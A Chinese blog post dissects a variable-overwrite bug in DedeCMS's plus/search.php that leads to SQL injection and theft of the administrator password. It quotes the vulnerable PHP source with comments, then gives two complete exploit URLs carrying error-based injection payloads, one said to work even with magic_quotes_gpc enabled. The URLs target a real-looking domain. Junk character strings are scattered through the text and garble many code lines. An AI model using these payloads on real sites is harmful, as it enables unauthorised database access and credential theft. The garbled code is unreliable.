微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.) H% h8 c& X1 O
作者: c4rp3nt3r@0x50sec.org
5 j4 y+ p6 {( `9 z6 |$ L9 gDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码., u/ y6 M( }$ m) G, P
# z6 e! m ?- l! g% }; j
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.% E9 N7 V% }& J+ ^, g4 f9 J
. c0 ]7 \1 v' ^- K4 U============
7 l, K H( m0 h; A% P
2 L% U4 T' W* W( j( u) F9 R
* p* ] {5 p A: W) u9 v1 J4 t1 i& V; jDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
& {4 V$ b- d" J+ ?7 d 3 W/ D9 j8 h- a
require_once(dirname(__FILE__).”/../include/common.inc.php”);
. e; q7 L2 o' K2 ^$ x' @: q/ Rrequire_once(DEDEINC.”/arc.searchview.class.php”);
( D# [- C; C- w - f* A) v; R2 ^* f- L" o, q; s
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;5 r' ?) u. e; U y
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
/ Z( \: ~& K/ n2 N9 L$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
3 _4 i, B5 P2 m8 R6 k$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
+ p3 x% j) t' o% F; r$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
# ~& n- W. v; {, Q6 X& K 8 c6 z/ Z; K" z3 N/ O2 a- }) w
if(!isset($orderby)) $orderby=”;
8 R- o( R& [" N6 M4 ?5 x. Gelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
% u0 Y5 a1 |& z& ]# n9 {( f ' P t9 z- O0 [
, n; d: k1 D# Qif(!isset($searchtype)) $searchtype = ‘titlekeyword’;$ M& j+ e+ }+ I- s, ^4 s. K
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
; M8 i0 L4 R8 r$ J1 T1 w 7 u8 y1 R: ]5 V' l# Y7 F% E$ g
if(!isset($keyword)){% ~( x& j+ Y( r3 B/ Y. H$ H
if(!isset($q)) $q = ”;
$ i7 Y: |% c+ E, }1 d" C. ^ $keyword=$q;; d' d N% N: Y& v
}# K- a0 {) \) h" V. V) j
1 G; F F% r' H: F0 k$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));, `% Q( f/ X: }4 w' T; [# t, J Q# Y
( ?3 _- S3 _3 w4 t
//查找栏目信息% ~0 t, A" c4 s
if(empty($typeid))3 S/ K5 o0 d5 ^) @$ X3 |
{2 A$ s8 {" E$ \% w8 k* l, S
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;* o' D& N l3 j9 Z4 Y
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) ), S0 O2 T2 Q, N) c+ e1 r. h
{9 G: y0 C6 m( D4 ]1 }; e% D. ~
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
" ^/ F0 [5 h. i fwrite($fp, “<”.”?php\r\n”);
$ `" n5 r. V9 h# T5 L0 y% Y $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);2 u* J! I$ f5 q5 n
$dsql->Execute();6 v1 v, @0 q3 ]# A8 w% O% }1 h
while($row = $dsql->GetArray()); J! M- |8 y% W% C+ b, V
{1 C+ o1 U! U5 S! W& c
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
) J8 d/ _; G, m }
/ a2 q0 C% g# N2 E fwrite($fp, ‘?’.'>’);
" ]1 ^8 R; u( Y% X fclose($fp);
( N3 F& r/ I2 j) p: {$ Z6 ` }
: L9 m W6 P# [ //引入栏目缓存并看关键字是否有相关栏目内容
5 J' J% a; R8 {8 [ require_once($typenameCacheFile);
+ J: v3 P7 R0 B+ ~& s7 u//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
$ ]% A. Q$ Q4 Z7 @9 ~//
! O! H i# z9 F- i" i if(isset($typeArr) && is_array($typeArr))6 K3 B" D8 a9 G
{
8 V- v v5 \3 V1 v. @ foreach($typeArr as $id=>$typename) v4 y& O! n( Q1 v1 f T4 t5 @% T
{
3 c8 Q1 ^( B1 \' W , m1 [6 r& D/ h& o5 J- O
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
; v& ?, Q3 Z+ f! H5 m5 n if($keyword != $keywordn)
2 ], H. x3 H1 ^( V% P, m9 C+ R {
+ m% c" x; [/ r/ K/ H# m) z $keyword = $keywordn;7 ?7 y! e$ j, m x" [
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
2 F' r' Z6 j# M7 m( g7 g; C break;! d: c. r# D* ?5 I$ w
}
5 V5 N: x( j1 n& Z! a+ R }
# \+ ?$ z' F# R$ D) o! P( L }4 v: x+ b6 U8 i$ R
}; Z0 N! h8 F! q
然后plus/search.php文件下面定义了一个 Search类的对象 .6 C$ x/ _% `' e5 Y9 M7 j, b; u
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
, ^2 p4 N I( U3 ~: P7 _/ O! ^$this->TypeLink = new TypeLink($typeid);
( f2 ~2 k, R! W& b( B
2 O( |2 }9 u3 n# yTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
7 j* F) m$ e: U% c. W 4 I" o$ i' w8 g6 A/ a8 L
class TypeLink: m% o" P$ s! `
{" e7 o, |. d/ z: C* R$ F
var $typeDir;8 S4 J0 E/ x4 X! l
var $dsql;
7 {4 Y% h2 F6 K; q( r- b var $TypeID;" T2 u' u- X. n
var $baseDir;
) }9 P( ^2 Y( v var $modDir;
" h! b; h$ u+ \9 V& R( F var $indexUrl;
5 w$ e9 [5 b' n: P. f5 {3 }( `6 ^ var $indexName;5 ]; j3 @, `$ |' \- Q; n A
var $TypeInfos;' R! L8 k- o( r6 r( a) p7 L
var $SplitSymbol;2 l D0 y1 y! x
var $valuePosition;; O9 Y. l; D8 \2 a& f
var $valuePositionName;* E6 ]/ v9 r5 g2 M
var $OptionArrayList;//构造函数///////' K9 A1 }3 |' R' i) ^1 C' R
//php5构造函数7 E# F/ A9 ]% ]2 T
function __construct($typeid)8 B) T- ]) ?6 R+ U, P; u! Q
{% Y0 S0 @# X2 [- o! F2 j7 N2 a
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
! T' j0 |3 D0 _3 h, r $this->indexName = $GLOBALS['cfg_indexname'];/ V/ R. F: ?/ H/ p! R# v
$this->baseDir = $GLOBALS['cfg_basedir'];
; @% T& `( j6 s, n% ?. E $this->modDir = $GLOBALS['cfg_templets_dir'];* c0 A9 g( V' V& X7 t
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
' i v4 }- ]3 B7 D0 M. f7 d $this->dsql = $GLOBALS['dsql'];
8 N1 d& O2 ~, { $this->TypeID = $typeid;9 C+ I& k3 i/ Z1 x( ?$ Z) D: N
$this->valuePosition = ”;
: g. }/ o% w3 _/ ~: Z $this->valuePositionName = ”;
. q6 Z2 Y' {, u7 I1 M, W' j $this->typeDir = ”;/ a& `: f \. W, R
$this->OptionArrayList = ”;3 B( e: V7 D5 Z$ {% t* e
K; Q4 Y4 t' E1 u w ^, F
//载入类目信息$ I2 H( e9 }, [$ V. p
2 s" G4 a3 w, o/ f i" O3 P <font color=”Red”>$query = “SELECT tp.*,ch.typename as7 f% T i) C" z. }% i* r
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join/ d/ `8 j. x5 h& G. \* J W2 P
`#@__channeltype` ch
" r- Z$ D+ A8 h! L& P+ m: q/ { on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
* \9 {6 Y$ y7 p9 {
0 E6 D" m3 }/ L if($typeid > 0)
- \3 _( }; s, |% U. u# Y7 r {- b' u8 { H$ d P$ t! f
$this->TypeInfos = $this->dsql->GetOne($query);: r c3 f( Z0 M0 \8 _
利用代码一 需要 即使magic_quotes_gpc = Off6 @3 [1 _- }; \& [ M% Q1 l
9 J9 \7 V9 T7 y2 n/ lwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title. z% k' @2 I: W' S$ B, P* z# R$ h* R/ K$ M
: G% E! }. m6 j/ I% P) F9 ]
这只是其中一个利用代码… Search 类的构造函数再往下
, a/ S3 O0 k8 T( A- [ ! V3 V* A L2 i5 p' P( `1 ^
……省略
) H4 c0 v$ K1 o5 @$this->TypeID = $typeid;8 u. Y5 C. R% ~- q3 ^1 f
……省略
3 o: @# x/ u: P4 S% yif($this->TypeID==”0″){
- P* B' Y4 [1 r$ r0 r $this->ChannelTypeid=1;
- a; D6 |! c% ^# U }else{
' J% y" M0 w8 {. q/ V! e3 n $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
0 F0 T* o9 G% a# T* ?, y# ^4 I//现在不鸡肋了吧亲…
- T& j4 }" q3 z2 N $this->ChannelTypeid=$row['channeltype'];8 @/ a2 T4 z# u: y4 A' W
+ Y" D# t* \+ Z9 B& b9 N) O
}
5 n! d) N/ [8 t利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用./ c6 A; p' v3 e8 F
8 o/ v& l/ {& Qwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title& ^4 u6 u* B, T( D$ W( r3 U
2 o A4 o- i+ t5 s. a如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
/ N+ D' Q5 U) K2 h0 d/ S+ I |